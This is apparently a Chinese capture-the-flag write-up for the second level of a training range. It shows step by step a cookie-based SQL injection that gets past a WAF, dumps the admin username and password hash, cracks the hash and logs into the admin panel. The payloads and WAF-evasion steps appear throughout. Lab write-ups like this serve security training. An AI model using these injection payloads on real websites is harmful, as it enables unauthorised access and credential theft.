封神台第二关

点击传送门

来到目标公司网站

可以看到有很多的网页

现在我们需要寻找注入点,注入点存在的页面一般可以明显的显示出正确页面和错误页面

这里可以看到有新闻页面

有新闻的一般选择新闻页面

我们点击第一个新闻

进来后可以看到

URL为

http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171

开始试探

(1)判断waf拦截的关键字

'触发waf

and触发waf

or触发waf

select触发waf

union order by不会触发waf

--+不能被数据库识别,要使用#

(2)联合查询注入尝试

得到注入点数量,构建联合查询语句

?id=171 union select 1,2,3,4,5,6,7,8,9,10#

利用SQL绕过手法使得select可用

试图转码绕过失败

试图利用/**/和/*!*/绕过失败

放弃联合查询

(3)cookies绕过尝试

尝试cookies绕过

直接访问http://g8wepfcp.ia.aqlab.cn/shownews.asp

利用bp抓包,将原cookies值

Cookie: ASPSESSIONIDACQTQQAS=OKOJFAODPDJCCFEKBAECGJDK

改为

Cookie: id=171

访问网页,发现访问的页面正常输出,cookies可以当值来用

将值改为联合查询语句

并猜测表admin的存在性

Cookie: id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

页面返回正常,说明admin表存在

且页面返回的字段有2,3,7,8,9

这时可以将注入点2,3,7,8,9替换为字段名,用这种方式来猜测字段的存在,并体现返回值

Cookie: id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

页面返回

username:admin

password:b9a2a2b5dffb918c

利用bp解码后

password为welcome

利用御剑后台扫描工具

得到后台网站

http://g8wepfcp.ia.aqlab.cn/admin/Login.asp

输入账户密码

成功通过

相关推荐
juniperhan13 分钟前
Flink 系列第24篇:Flink SQL 集成维度表指南:存储选型、参数调优与实战避坑
大数据·数据仓库·sql·flink
雨辰AI16 分钟前
从 MySQL 迁移至人大金仓 V9 完整改造指南|分页 / 函数 / 语法兼容全部解决
java·开发语言·数据库·后端·mysql·政务
Chengbei1127 分钟前
AI大模型网关存在SQL注入、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·安全·web安全·网络安全·系统安全
一拳一个娘娘腔30 分钟前
告别图形化界面:基于CLI的Windows系统入侵排查与防御实战手册
windows·安全
zx28596340032 分钟前
Laravel 9.x:全面升级与核心特性
数据库
努力努力再努力wz1 小时前
【MySQL进阶系列】一文打通事务机制:从锁、Undo Log 到 MVCC 与隔离级别
c语言·数据结构·数据库·c++·mysql·算法·github
PaperData1 小时前
2000-2025年《中国县域统计年鉴》pdf+excel版(附赠面板数据)
数据库·人工智能·数据分析·pdf·经管
冷小鱼1 小时前
从关系模型(SQL)基石到AI与信创时代的智能查询语言
数据库·sql
庞轩px1 小时前
致远互联实习复盘:一条SQL替代300次循环查询,组织架构选择器从5秒降到300毫秒
java·sql·mysql·mybatis·实习经历·n+1问题·join联表查询
hwscom2 小时前
Linux服务器如何进行安全加固,防止黑客攻击(Windows也适用)
linux·服务器·安全